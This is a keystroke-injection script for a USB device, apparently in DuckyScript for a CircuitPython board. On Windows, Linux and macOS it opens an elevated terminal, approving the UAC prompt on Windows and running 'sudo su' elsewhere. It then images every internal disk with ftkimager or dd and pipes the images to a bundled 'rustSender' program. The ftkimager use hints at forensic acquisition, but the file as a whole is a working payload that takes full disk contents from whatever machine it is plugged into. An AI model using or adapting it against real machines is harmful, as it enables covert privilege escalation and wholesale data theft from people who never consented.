REM (c) 2022 Matthew
REM This code is licensed under MIT license (see LICENSE.txt for details)

REM WINDOWS OPEN TERMINAL
DELAY 10000
GUI r
DELAY 200
STRING cmd.exe
DELAY 1000
CTRL SHIFT ENTER
DELAY 3000
ALT y
DELAY 3000
ENTER

REM LINUX OPEN TERMINAL
DELAY 200
CTRL ALT T
DELAY 3000
STRING sudo su
ENTER
DELAY 3000
ENTER

REM OSX OPEN TERMINAL
DELAY 3000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 3000
STRING sudo su
ENTER
DELAY 3000
ENTER

REM CREATE CLONE WINDOWS
DELAY 1000
STRING setlocal ENABLEDELAYEDEXPANSION
DELAY 500
ENTER
STRING for /F "tokens=1 usebackq" %r in (`wmic logicaldisk where "VolumeName='CIRCUITPY'" get Caption ^| find ":"`) do (set drive=%r & set num=%random%)
DELAY 2000
ENTER
DELAY 500
STRING for /F "tokens=1 usebackq" %p in (`wmic logicaldisk get caption`) do (for /f %i in ('where /R %p ftkimager') do (cd /d %~dpi) & if exist %i (FOR /F "tokens=1 usebackq" %c in (`wmic logicaldisk get caption`) do (if NOT %c == %~di if NOT %c == Caption if NOT %c == %drive% (ftkimager %c - --compress 9 | rustSender_WIN.exe localhost %c%num%%date%.img)))) 
DELAY 3000
ENTER


REM CREATE CLONE LINUX
DELAY 200
REM STRING cd "$(dirname "$(find / -type f -name rustSender 2>/dev/null | head -1)")"
REM ENTER
REM DELAY 2000
REM DELAY 200
REM STRING sudo chmod +x rustSender
REM ENTER
STRING cd "$(dirname "$(find / -type f -name rustSender 2>/dev/null | head -1)")" && sudo lsblk -nl | grep -v 'CIRCUITPY'| grep part | cut -d' ' -f1 | sed 's/^/\/dev\//' | xargs -idisk bash -c 'sudo dd bs=10M if=disk status=progress | ./rustSender localhost "$(tr -d / <<<$disk)"$(date +"-%F.%H%M").img'
DELAY 3000
ENTER


REM CREATE CLONE OSX
DELAY 200
STRING cd "$(dirname "$(find / -type f -name rustSender_MAC 2>/dev/null | head -1)")"
ENTER
DELAY 2000
REM STRING sudo chmod +x rustSender_MAC
REM DELAY 200
REM ENTER
STRING sudo diskutil list internal |grep -v dev | grep -h [[:alpha:]]*disk[[:alpha:]]* | tr ' ' '\n' | grep -h [[:alpha:]]*disk[[:alpha:]]* | sed 's/^/\/dev\//' | xargs -idisk bash -c 'sudo dd bs=10M if=disk status=progress | ./rustSender_MAC localhost "$(tr -d / <<<$disk)"$(date +"-%F.%H%M").img'
DELAY 3000
ENTER
